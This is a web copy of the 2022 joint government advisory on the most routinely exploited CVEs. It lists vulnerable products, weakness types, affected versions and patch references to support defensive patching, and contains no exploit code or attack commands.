CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
EPSS
Percentile
100.0%
The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):
This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.
Download the PDF version of this report:
AA23-215A PDF (PDF, 980.90 KB )
In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. Proof of concept (PoC) code was publicly available for many of the software vulnerabilities or vulnerability chains, likely facilitating exploitation by a broader range of malicious cyber actors.
Malicious cyber actors generally have the most success exploiting known vulnerabilities within the first two years of public disclosure—the value of such vulnerabilities gradually decreases as software is patched or upgraded. Timely patching reduces the effectiveness of known, exploitable vulnerabilities, possibly decreasing the pace of malicious cyber actor operations and forcing pursuit of more costly and time-consuming methods (such as developing zero-day exploits or conducting software supply chain operations).
Malicious cyber actors likely prioritize developing exploits for severe and globally prevalent CVEs. While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. Additionally, cyber actors likely give higher priority to vulnerabilities that are more prevalent in their specific targets’ networks. Multiple CVE or CVE chains require the actor to send a malicious web request to the vulnerable device, which often includes unique signatures that can be detected through deep packet inspection.
Table 1 shows the top 12 vulnerabilities the co-authors observed malicious cyber actors routinely exploiting in 2022:
Table 1: Top 12 Routinely Exploited Vulnerabilities in 2022 CVE | Vendor | Product | Type | CWE |
---|---|---|---|---|
CVE-2018-13379 | Fortinet | FortiOS and FortiProxy | SSL VPN credential exposure | CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-34473 (Proxy Shell) | Microsoft | Exchange Server | RCE | CWE-918 Server-Side Request Forgery (SSRF) |
CVE-2021-31207 (Proxy Shell) | Microsoft | Exchange Server | Security Feature Bypass | CWE-22 Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-34523 (Proxy Shell) | Microsoft | Exchange Server | Elevation of Privilege | CWE-287 Improper Authentication |
CVE-2021-40539 | Zoho ManageEngine | ADSelfService Plus | RCE/ Authentication Bypass | CWE-287 Improper Authentication |
CVE-2021-26084 | Atlassian | Confluence Server and Data Center | Arbitrary code execution | CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) |
CVE-2021- 44228 (Log4Shell) | Apache | Log4j2 | RCE | CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption CWE-502 Deserialization of Untrusted Data |
CVE-2022-22954 | VMware | Workspace ONE Access and Identity Manager | RCE | CWE-94 Improper Control of Generation of Code (‘Code Injection’) |
CVE-2022-22960 | VMware | Workspace ONE Access, Identity Manager, and vRealize Automation | Improper Privilege Management | CWE-269 Improper Privilege Management |
CVE-2022-1388 | F5 Networks | BIG-IP | Missing Authentication Vulnerability | CWE-306 Missing Authentication for Critical Function |
CVE-2022-30190 | Microsoft | Multiple Products | RCE | None Listed |
CVE-2022-26134 | Atlassian | Confluence Server and Data Center | RCE | CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) |
In addition to the 12 vulnerabilities listed in Table 1, the authoring agencies identified vulnerabilities—listed in Table 2—that were also routinely exploited by malicious cyber actors in 2022.
Table 2: Additional Routinely Exploited Vulnerabilities in 2022 CVE | Vendor | Product | Type | CWE |
---|---|---|---|---|
CVE-2017-0199 | Microsoft | Multiple Products | Arbitrary Code Execution | None Listed |
CVE-2017-11882 | Microsoft | Exchange Server | Arbitrary Code Execution | CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer |
CVE-2019-11510 | Ivanti | Pulse Secure Pulse Connect Secure | Arbitrary File Reading | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2019-0708 | Microsoft | Remote Desktop Services | RCE | CWE-416: Use After Free |
CVE-2019-19781 | Citrix | Application Delivery Controller and Gateway | Arbitrary Code Execution | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2020-5902 | F5 Networks | BIG-IP | RCE | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2020-1472 | Microsoft | Multiple Products | Privilege Escalation | CWE-330: Use of Insufficiently Random Values |
CVE-2020-14882 | Oracle | WebLogic Server | RCE | None Listed |
CVE-2020-14883 | Oracle | WebLogic Server | RCE | None Listed |
CVE-2021-20016 | SonicWALL | SSLVPN SMA100 | SQL Injection | CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) |
CVE-2021-26855 (ProxyLogon) | Microsoft | Exchange Server | RCE | CWE-918: Server-Side Request Forgery (SSRF) |
CVE-2021-27065 (ProxyLogon) | Microsoft | Exchange Server | RCE | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-26858 (ProxyLogon) | Microsoft | Exchange Server | RCE | None Listed |
CVE-2021-26857 (ProxyLogon) | Microsoft | Exchange Server | RCE | CWE-502: Deserialization of Untrusted Data |
CVE-2021-20021 | SonicWALL | Email Security | Privilege Escalation Exploit Chain | CWE-269: Improper Privilege Management |
CVE-2021-40438 | Apache | HTTP Server | Server-Side Request Forgery | CWE-918: Server-Side Request Forgery (SSRF) |
CVE-2021-41773 | Apache | HTTP Server | Server Path Traversal | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-42013 | Apache | HTTP Server | Server Path Traversal | CWE-22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) |
CVE-2021-20038 | SonicWall | SMA 100 Series Appliances | Stack-based Buffer Overflow | CWE-787: Out-of-bounds Write CWE-121: Stack-based Buffer Overflow |
CVE-2021-45046 | Apache | Log4j | RCE | CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) |
CVE-2022-42475 | Fortinet | FortiOS | Heap-based Buffer Overflow | CWE-787: Out-of-bounds Write |
CVE-2022-24682 | Zimbra | Collaboration Suite | ‘Cross-site Scripting’ | CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
CVE-2022-22536 | SAP | Internet Communication Manager (ICM) | HTTP Request Smuggling | CWE-444: Inconsistent Interpretation of HTTP Requests (‘HTTP Request/Response Smuggling’) |
CVE-2022-22963 | VMware Tanzu | Spring Cloud | RCE | CWE-94: Improper Control of Generation of Code (‘Code Injection’) CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (‘Expression Language Injection’) |
CVE-2022-29464 | WSO2 | Multiple Products | RCE | CWE-434: Unrestricted Upload of File with Dangerous Type |
CVE-2022-27924 | Zimbra | Zimbra Collaboration Suite | Command Injection | CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’) |
CVE-2022-22047 | Microsoft | Windows CSRSS | Elevation of Privilege | CWE-269: Improper Privilege Management |
CVE-2022-27593 | QNAP | QNAP NAS | Externally Controlled Reference | CWE-610: Externally Controlled Reference to a Resource in Another Sphere |
CVE-2022-41082 | Microsoft | Exchange Server | Privilege Escalation | None Listed |
CVE-2022-40684 | Fortinet | FortiOS, FortiProxy, FortiSwitchManager | Authentication Bypass | CWE-306: Missing Authentication for Critical Function |
The authoring agencies recommend vendors and developers take the following steps to ensure their products are secure by design and default:
For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default.
The authoring agencies recommend end-user organizations implement the mitigations below to improve cybersecurity posture on the basis of the threat actors’ activity. These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on CPGs, including additional recommended baseline protections.
The information in this report is being provided “as is” for informational purposes only. CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.
This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.
[1] Apache Log4j Vulnerability Guidance
August 3, 2023: Initial version.
CVE | Vendor | Affected Products and Versions | Patch Information | Resources |
---|---|---|---|---|
CVE-2017-0199 | Microsoft | Multiple Products | Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows | |
CVE-2017-11882 | Microsoft | Office, Multiple Versions | Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882 | |
CVE-2018-13379 | Fortinet | FortiOS and FortiProxy 2.0.2, 2.0.1, 2.0.0, 1.2.8, 1.2.7, 1.2.6, 1.2.5, 1.2.4, 1.2.3, 1.2.2, 1.2.1, 1.2.0, 1.1.6 | FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests | Joint CSAs: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities Russian State-Sponsored Cyber Actors Target Cleared Defense Contractor Networks to Obtain Sensitive U.S. Defense Information and Technology APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations |
CVE-2019-11510 | Ivanti | Pulse Secure Pulse Connect Secure versions, 9.0R1 to 9.0R3.3, 8.3R1 to 8.3R7, and 8.2R1 to 8.2R12 | SA44101 - 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX | CISA Alerts: Continued Exploitation of Pulse Secure VPN Vulnerability Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity ACSC Advisory: 2019-129: Recommendations to mitigate vulnerability in Pulse Connect Secure VPN Software Joint CSA: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations CCCS Alert: APT Actors Target U.S. and Allied Networks - Update 1 |
CVE-2019-0708 | Microsoft | Remote Desktop Services | Remote Desktop Services Remote Code Execution Vulnerability | |
CVE-2019-19781 | Citrix | ADC and Gateway version 13.0 all supported builds before 13.0.47.24 NetScaler ADC and NetScaler Gateway, version 12.1 all supported builds before 12.1.55.18; version 12.0 all supported builds before 12.0.63.13; version 11.1 all supported builds before 11.1.63.15; version 10.5 all supported builds before 10.5.70.12 SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO all supported software release builds before 10.2.6b and 11.0.3b | CVE-2019-19781 - Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance | Joint CSAs: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations Chinese Ministry of State Security-Affiliated Cyber Threat Actor Activity CCCS Alert: Detecting Compromises relating to Citrix CVE-2019-19781 |
CVE-2020-5902 | F5 | BIG IP versions 15.1.0, 15.0.0 to 15.0.1, 14.1.0 to 14.1.2, 13.1.0 to 13.1.3, 12.1.0 to 12.1.5, and 11.6.1 to 11.6.5 | K52145254: TMUI RCE vulnerability CVE-2020-5902 | CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902 |
CVE-2020-1472 | Microsoft | Windows Server, Multiple Versions | Microsoft Security Update Guide: Netlogon Elevation of Privilege Vulnerability, CVE-2020-1472 | ACSC Advisory: 2020-016: Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472) Joint CSA: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations CCCS Alert: Microsoft Netlogon Elevation of Privilege Vulnerability - CVE-2020-1472 - Update 1 |
CVE-2020-14882 | Oracle | WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 | Oracle Critical Patch Update Advisory - October 2020 | |
CVE-2020-14883 | Oracle | WebLogic Server, versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 | Oracle Critical Patch Update Advisory - October 2020 | |
CVE-2021-20016 | SonicWALL | SSLVPN SMA100, Build Version 10.x | Confirmed Zero-day vulnerability in the SonicWall SMA100 build version 10.x | |
CVE-2021-26855 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26855 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities |
CVE-2021-26857 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26857 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities |
CVE-2021-26858 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-26858 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities |
CVE-2021-27065 | Microsoft | Multiple Products | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-27065 | CISA Alert: Mitigate Microsoft Exchange Server Vulnerabilities |
CVE-2021-20021 | SonicWALL | Email Security version 10.0.9.x Email Security | SonicWall Email Security pre-authentication administrative account creation vulnerability | |
CVE-2021-31207 | Microsoft | Exchange Server, Multiple Versions | Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31207 | CISA Alert: Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities ACSC Alert: Microsoft Exchange ProxyShell Targeting in Australia |
CVE-2022-26134 | Atlassian | Confluence Server and Data Center, versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1 | Confluence Security Advisory 2022-06-02 | CISA Alert: CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog ACSC Alert: Remote code execution vulnerability present in Atlassian Confluence Server and Data Center |
CVE-2021-34473 | Microsoft | Exchange Server, Multiple Version | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2021-34473 | Joint CSA: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities |
CVE-2021-34523 | Microsoft | Microsoft Exchange Server 2013 Cumulative Update 23 Microsoft Exchange Server 2016 Cumulative Updates 19 and 20 Microsoft Exchange Server 2019 Cumulative Updates 8 and 9 | Microsoft Exchange Server Elevation of Privilege Vulnerability, CVE-2021-34523 | CISA Alert: Urgent: Protect Against Active Exploitation of ProxyShell Vulnerabilities |
CVE-2021-26084 | Jira Atlassian | Confluence Server and Data Center, versions 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. | Jira Atlassian: Confluence Server Webwork OGNL injection - CVE-2021-26084 | CISA Alert: Atlassian Releases Security Updates for Confluence Server and Data Center |
CVE-2021-40539 | Zoho ManageEngineCorp. | ManageEngine ADSelfService Plus builds up to 6113 | Security advisory - ADSelfService Plus authentication bypass vulnerability | ACSC Alert: Critical vulnerability in ManageEngine ADSelfService Plus exploited by cyber actors |
CVE-2021-40438 | Apache | HTTP Server 2.4.48 | ||
CVE-2021-41773 | Apache | Apache HTTP Server 2.4.49 | Apache HTTP Server 2.4 vulnerabilities | |
CVE-2021-42013 | Apache | Apache HTTP Server 2.4.50 | Apache HTTP Server 2.4 vulnerabilities | |
CVE-2021-20038 | SonicWall | SMA 100 Series (SMA 200, 210, 400, 410, 500v), versions 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24svSMA 100 series appliances | SonicWall patches multiple SMA100 affected vulnerabilities | ACSC Alert: Remote code execution vulnerability present in SonicWall SMA 100 series appliances CCCS Alert: SonicWall Security Advisory |
CVE-2021- 44228 | Apache | Log4j, all versions from 2.0-beta9 to 2.14.1 For other affected vendors and products, see CISA’s GitHub repository. | Apache Log4j Security Vulnerabilities For additional information, see joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities | CISA webpage: Apache Log4j Vulnerability Guidance CCCS Alert: Active exploitation of Apache Log4j vulnerability - Update 7 ACSC Advisory: 2021-007: Log4j vulnerability – advice and mitigations ACSC Publication: Log4j: What Boards and Directors Need to Know |
CVE-2021-45046 | Apache | Log4j 2.15.0Log4j | Apache Log4j Security Vulnerabilities | |
CVE-2022-42475 | Fortinet | FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier | FortiOS - heap-based buffer overflow in sslvpnd | |
CVE-2022-24682 | Zimbra | Zimbra Collaboration Suite 8.8.x before 8.8.15 patch 30 (update 1) Collaboration Suite | Zimbra Collaboration Joule 8.8.15 Patch 30 GA Release | |
CVE-2022-22536 | SAP | NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53, and SAP Web Dispatcher Internet Communication Manager (ICM) | Remediation of CVE-2022-22536 Request smuggling and request concatenation in SAP NetWeaver, SAP Content Server and SAP Web Dispatcher | CISA Alert: Critical Vulnerabilities Affecting SAP Applications Employing Internet Communication Manager (ICM) |
CVE-2022-22963 | VMware Tanzumware Tanzu | Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions | CVE-2022-22963: Remote code execution in Spring Cloud Function by malicious Spring Expression | |
CVE-2022-22954 | VMware | Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0 Identity Manager (vIDM) 3.3.6, 3.3.5, 3.3.4, 3.3.3 vRealize Automation (vIDM), 8.x, 7.6 VMware Cloud Foundation (vIDM), 4.x vRealize Suite Lifecycle Manager (vIDM), 8.xWorkspace ONE Access and Identity Manager | VMware Advisory VMSA-2022-0011 | |
CVE-2022-22960 | VMware | Workspace ONE Access, versions 21.08.0.1, 21.08.0.0, 20.10.0.1, 20.10.0.0 Identity Manager (vIDM) and vRealize Automation3.3.6, 3.3.5, 3.3.4, 3.3.3 vRealize Automation (vIDM), 8.x, 7.6 VMware Cloud Foundation (vIDM), 4.x VMware Cloud Foundation (vRA), 3.x vRealize Suite Lifecycle Manager (vIDM), 8.x | VMSA-2022-0011 | |
CVE-2022-29464 | AtlassianWSO2 | WSO2 API Manager 2.2.0 and above through 4.0.0 WSO2 Identity Server 5.2.0 and above through 5.11.0 WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0 WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0 WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0 | WSO2 Documentation - Spaces | |
CVE-2022-27924 | Zimbra | Zimbra Collaboration Suite, 8.8.15 and 9.0 | Zimbra Collaboration Kepler 9.0.0 Patch 24.1 GA Release | |
CVE-2022-1388 | F5 Networks | F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and All 12.1.x and 11.6.x versions | K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388 | Joint CSA: Threat Actors Exploiting F5 BIG-IP CVE-2022-1388 |
CVE-2022-30190 | Microsoft | Exchange Server, Multiple Versions | CISA Alert: Microsoft Releases Workaround Guidance for MSDT “Follina” Vulnerability | |
CVE-2022-22047 | Microsoft | Multiple Products | Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability, CVE-2022-22047 | |
CVE-2022-27593 | QNAP | Certain QNAP NAS running Photo Station with internet exposure Ausustor Network Attached Storage | DeadBolt Ransomware | |
CVE-2022-41082 | Microsoft | Exchange Server 2016 Cumulative Update 23, 2019 Cumulative Update 12, 2019 Cumulative Update 11, 2016 Cumulative Update 22, and 2013 Cumulative Update 23 | Microsoft Exchange Server Remote Code Execution Vulnerability, CVE-2022-41082 | ACSC Alert: Vulnerability Alert – 2 new Vulnerabilities associated with Microsoft Exchange. |
CVE-2022-40684 | Fortinet | FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 | FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass on administrative interface |
cwe.mitre.org/data/definitions/121.html
blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
cisasurvey.gov1.qualtrics.com/jfe/form/SV_9n4TtB8uttUPaM6?product=https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a
confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
csrc.nist.gov/publications/detail/sp/800-218/final
csrc.nist.gov/publications/detail/sp/800-218/final
cwe.mitre.org/data/definitions/119.html
cwe.mitre.org/data/definitions/20.html
cwe.mitre.org/data/definitions/22.html
cwe.mitre.org/data/definitions/22.html
cwe.mitre.org/data/definitions/22.html
cwe.mitre.org/data/definitions/22.html
cwe.mitre.org/data/definitions/22.html
cwe.mitre.org/data/definitions/22.html
cwe.mitre.org/data/definitions/22.html
cwe.mitre.org/data/definitions/22.html
cwe.mitre.org/data/definitions/269.html
cwe.mitre.org/data/definitions/269.html
cwe.mitre.org/data/definitions/269.html
cwe.mitre.org/data/definitions/287.html
cwe.mitre.org/data/definitions/287.html
cwe.mitre.org/data/definitions/306.html
cwe.mitre.org/data/definitions/306.html
cwe.mitre.org/data/definitions/330.html
cwe.mitre.org/data/definitions/400.html
cwe.mitre.org/data/definitions/416.html
cwe.mitre.org/data/definitions/434.html
cwe.mitre.org/data/definitions/444.html
cwe.mitre.org/data/definitions/502.html
cwe.mitre.org/data/definitions/502.html
cwe.mitre.org/data/definitions/610.html
cwe.mitre.org/data/definitions/74.html
cwe.mitre.org/data/definitions/74.html
cwe.mitre.org/data/definitions/74.html
cwe.mitre.org/data/definitions/787.html
cwe.mitre.org/data/definitions/787.html
cwe.mitre.org/data/definitions/79.html
cwe.mitre.org/data/definitions/89.html
cwe.mitre.org/data/definitions/917.html
cwe.mitre.org/data/definitions/917.html
cwe.mitre.org/data/definitions/917.html
cwe.mitre.org/data/definitions/918.html
cwe.mitre.org/data/definitions/918.html
cwe.mitre.org/data/definitions/918.html
cwe.mitre.org/data/definitions/94.html
cwe.mitre.org/data/definitions/94.html
dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v2.0(U)_Sep22.pdf
forums.ivanti.com/s/article/SA44101?language=en_US
github.com/cisagov/log4j-affected-db
httpd.apache.org/security/vulnerabilities_24.html
httpd.apache.org/security/vulnerabilities_24.html
jira.atlassian.com/browse/CONFSERVER-67940
logging.apache.org/log4j/2.x/security.html
logging.apache.org/log4j/2.x/security.html
media.defense.gov/2022/Oct/06/2003092365/-1/-1/0/Joint_CSA_Top_CVEs_Exploited_by_PRC_cyber_actors_.PDF
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0708
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26857
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26858
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31207
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473
msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523
msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047
msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41082
my.f5.com/manage/s/article/K23605346
my.f5.com/manage/s/article/K52145254
nvd.nist.gov/vuln/detail/CVE-2017-0199
nvd.nist.gov/vuln/detail/CVE-2017-0199
nvd.nist.gov/vuln/detail/CVE-2017-11882
nvd.nist.gov/vuln/detail/CVE-2017-11882
nvd.nist.gov/vuln/detail/CVE-2018-13379
nvd.nist.gov/vuln/detail/CVE-2018-13379
nvd.nist.gov/vuln/detail/CVE-2018-13379
nvd.nist.gov/vuln/detail/CVE-2019-0708
nvd.nist.gov/vuln/detail/CVE-2019-0708
nvd.nist.gov/vuln/detail/CVE-2019-11510
nvd.nist.gov/vuln/detail/CVE-2019-11510
nvd.nist.gov/vuln/detail/CVE-2019-19781
nvd.nist.gov/vuln/detail/CVE-2019-19781
nvd.nist.gov/vuln/detail/CVE-2020-1472
nvd.nist.gov/vuln/detail/CVE-2020-1472
nvd.nist.gov/vuln/detail/CVE-2020-14882
nvd.nist.gov/vuln/detail/CVE-2020-14882
nvd.nist.gov/vuln/detail/CVE-2020-14883
nvd.nist.gov/vuln/detail/CVE-2020-14883
nvd.nist.gov/vuln/detail/CVE-2020-5902
nvd.nist.gov/vuln/detail/CVE-2020-5902
nvd.nist.gov/vuln/detail/CVE-2021-20016
nvd.nist.gov/vuln/detail/CVE-2021-20016
nvd.nist.gov/vuln/detail/CVE-2021-20021
nvd.nist.gov/vuln/detail/CVE-2021-20021
nvd.nist.gov/vuln/detail/CVE-2021-20038
nvd.nist.gov/vuln/detail/CVE-2021-20038
nvd.nist.gov/vuln/detail/CVE-2021-26084
nvd.nist.gov/vuln/detail/CVE-2021-26084
nvd.nist.gov/vuln/detail/CVE-2021-26084
nvd.nist.gov/vuln/detail/CVE-2021-26084
nvd.nist.gov/vuln/detail/CVE-2021-26855
nvd.nist.gov/vuln/detail/CVE-2021-26855
nvd.nist.gov/vuln/detail/CVE-2021-26857
nvd.nist.gov/vuln/detail/CVE-2021-26857
nvd.nist.gov/vuln/detail/CVE-2021-26858
nvd.nist.gov/vuln/detail/CVE-2021-26858
nvd.nist.gov/vuln/detail/CVE-2021-27065
nvd.nist.gov/vuln/detail/CVE-2021-27065
nvd.nist.gov/vuln/detail/CVE-2021-31207
nvd.nist.gov/vuln/detail/CVE-2021-31207
nvd.nist.gov/vuln/detail/CVE-2021-31207
nvd.nist.gov/vuln/detail/CVE-2021-34473
nvd.nist.gov/vuln/detail/CVE-2021-34473
nvd.nist.gov/vuln/detail/CVE-2021-34473
nvd.nist.gov/vuln/detail/CVE-2021-34523
nvd.nist.gov/vuln/detail/CVE-2021-34523
nvd.nist.gov/vuln/detail/CVE-2021-34523
nvd.nist.gov/vuln/detail/CVE-2021-40438
nvd.nist.gov/vuln/detail/CVE-2021-40438
nvd.nist.gov/vuln/detail/CVE-2021-40539
nvd.nist.gov/vuln/detail/CVE-2021-40539
nvd.nist.gov/vuln/detail/CVE-2021-40539
nvd.nist.gov/vuln/detail/CVE-2021-41773
nvd.nist.gov/vuln/detail/CVE-2021-41773
nvd.nist.gov/vuln/detail/CVE-2021-42013
nvd.nist.gov/vuln/detail/CVE-2021-42013
nvd.nist.gov/vuln/detail/CVE-2021-44228
nvd.nist.gov/vuln/detail/CVE-2021-44228
nvd.nist.gov/vuln/detail/CVE-2021-44228
nvd.nist.gov/vuln/detail/CVE-2021-45046
nvd.nist.gov/vuln/detail/CVE-2021-45046
nvd.nist.gov/vuln/detail/CVE-2022-1388
nvd.nist.gov/vuln/detail/CVE-2022-1388
nvd.nist.gov/vuln/detail/CVE-2022-1388
nvd.nist.gov/vuln/detail/CVE-2022-22047
nvd.nist.gov/vuln/detail/CVE-2022-22047
nvd.nist.gov/vuln/detail/CVE-2022-22536
nvd.nist.gov/vuln/detail/CVE-2022-22536
nvd.nist.gov/vuln/detail/CVE-2022-22954
nvd.nist.gov/vuln/detail/CVE-2022-22954
nvd.nist.gov/vuln/detail/CVE-2022-22954
nvd.nist.gov/vuln/detail/CVE-2022-22960
nvd.nist.gov/vuln/detail/CVE-2022-22960
nvd.nist.gov/vuln/detail/CVE-2022-22960
nvd.nist.gov/vuln/detail/CVE-2022-22963
nvd.nist.gov/vuln/detail/CVE-2022-22963
nvd.nist.gov/vuln/detail/CVE-2022-24682
nvd.nist.gov/vuln/detail/CVE-2022-24682
nvd.nist.gov/vuln/detail/CVE-2022-26134
nvd.nist.gov/vuln/detail/CVE-2022-26134
nvd.nist.gov/vuln/detail/CVE-2022-26134
nvd.nist.gov/vuln/detail/CVE-2022-27593
nvd.nist.gov/vuln/detail/CVE-2022-27593
nvd.nist.gov/vuln/detail/CVE-2022-27924
nvd.nist.gov/vuln/detail/CVE-2022-27924
nvd.nist.gov/vuln/detail/CVE-2022-29464
nvd.nist.gov/vuln/detail/CVE-2022-29464
nvd.nist.gov/vuln/detail/CVE-2022-30190
nvd.nist.gov/vuln/detail/CVE-2022-30190
